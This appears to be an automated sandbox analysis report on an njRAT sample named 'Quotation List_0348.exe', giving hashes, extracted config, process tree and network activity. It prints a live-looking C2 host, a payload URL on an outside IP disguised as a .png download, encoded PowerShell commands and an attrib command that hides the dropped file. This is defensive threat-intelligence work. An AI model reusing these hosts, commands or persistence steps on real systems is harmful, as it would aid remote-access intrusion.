Analysis

  • max time kernel
    150s
  • max time network
    99s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    04/11/2022, 17:34 UTC

General

  • Target

    Quotation List_0348.exe

  • Size

    6KB

  • MD5

    53e70bf3a2964e9c086d8ea3ac0daddf

  • SHA1

    82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

  • SHA256

    246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

  • SHA512

    74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

  • SSDEEP

    96:XVuqNek+1LnGPL5RT2SzLAEy/tnp347KVYzNt:wH1Lqh2SzLAEUNR4g6

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

update

C2

money2022.ddns.net:8080

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Executes dropped EXE 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
    "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
      (the -enc argument is base64-encoded UTF-16LE and decodes to: Start-Sleep -Seconds 56)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:988
    • C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
      "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
      2⤵
      PID:1404
      • C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
        "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
        2⤵
        • Drops startup file
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:976
        • C:\Users\Admin\AppData\Roaming\update.exe
          "C:\Users\Admin\AppData\Roaming\update.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
            (the -enc argument is base64-encoded UTF-16LE and decodes to: Start-Sleep -Seconds 56)
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1672
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +r +s "C:\Users\Admin\AppData\Roaming\update.exe"
          3⤵
          • Views/modifies file attributes
          PID:364

    Network

    • NL
      GET
      http://194.180.48.203/Bgfjlzp.png
      Quotation List_0348.exe
      Remote address:
      194.180.48.203:80
      Request
      GET /Bgfjlzp.png HTTP/1.1
      Host: 194.180.48.203
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 04 Nov 2022 17:35:00 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
      Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
      ETag: "20ac00-5ec90202b35a1"
      Accept-Ranges: bytes
      Content-Length: 2141184
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • NL
      GET
      http://194.180.48.203/Bgfjlzp.png
      update.exe
      Remote address:
      194.180.48.203:80
      Request
      GET /Bgfjlzp.png HTTP/1.1
      Host: 194.180.48.203
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 04 Nov 2022 17:36:25 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
      Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
      ETag: "20ac00-5ec90202b35a1"
      Accept-Ranges: bytes
      Content-Length: 2141184
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • 194.180.48.203:80
      http://194.180.48.203/Bgfjlzp.png
      http
      Quotation List_0348.exe
      Sent: 37.4kB
      Received: 2.2MB
      Packets sent: 809
      Packets received: 1579

      HTTP Request

      GET http://194.180.48.203/Bgfjlzp.png

      HTTP Response

      200
    • 194.180.48.203:80
      http://194.180.48.203/Bgfjlzp.png
      http
      update.exe
      Sent: 36.7kB
      Received: 2.2MB
      Packets sent: 796
      Packets received: 1577

      HTTP Request

      GET http://194.180.48.203/Bgfjlzp.png

      HTTP Response

      200
    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      33b6647aac585dac651de8a32f421d31

      SHA1

      0b7b6ebbcf2557b8b1aecdf286b6bcea26074f60

      SHA256

      85870715e640843a3249fde91c2054ddeb384fdc4a4fc9c6ec42826800188c73

      SHA512

      5a7d61e88a6587b73ae145bb49b252d01bc9f82858b97cff3e258d7701d94e843ac98542b24b8ea889b260eaf7695449bac86f9826f8265396b4cf60d4a4b232

    • C:\Users\Admin\AppData\Roaming\update.exe

      Filesize

      6KB

      MD5

      53e70bf3a2964e9c086d8ea3ac0daddf

      SHA1

      82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

      SHA256

      246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

      SHA512

      74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

    • \Users\Admin\AppData\Roaming\update.exe

      Filesize

      6KB

      MD5

      53e70bf3a2964e9c086d8ea3ac0daddf

      SHA1

      82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

      SHA256

      246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

      SHA512

      74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

    • memory/976-70-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-72-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-62-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-63-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-66-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-65-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-67-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/988-61-0x000000006EE00000-0x000000006F3AB000-memory.dmp

      Filesize

      5.7MB

    • memory/988-60-0x000000006EE00000-0x000000006F3AB000-memory.dmp

      Filesize

      5.7MB

    • memory/988-59-0x000000006EE00000-0x000000006F3AB000-memory.dmp

      Filesize

      5.7MB

    • memory/1344-79-0x0000000000310000-0x0000000000318000-memory.dmp

      Filesize

      32KB

    • memory/1672-84-0x000000006EDD0000-0x000000006F37B000-memory.dmp

      Filesize

      5.7MB

    • memory/1672-85-0x000000006EDD0000-0x000000006F37B000-memory.dmp

      Filesize

      5.7MB

    • memory/1672-86-0x000000006EDD0000-0x000000006F37B000-memory.dmp

      Filesize

      5.7MB

    • memory/1972-54-0x00000000002D0000-0x00000000002D8000-memory.dmp

      Filesize

      32KB

    • memory/1972-56-0x0000000006B00000-0x0000000006D12000-memory.dmp

      Filesize

      2.1MB

    • memory/1972-55-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

      Filesize

      8KB
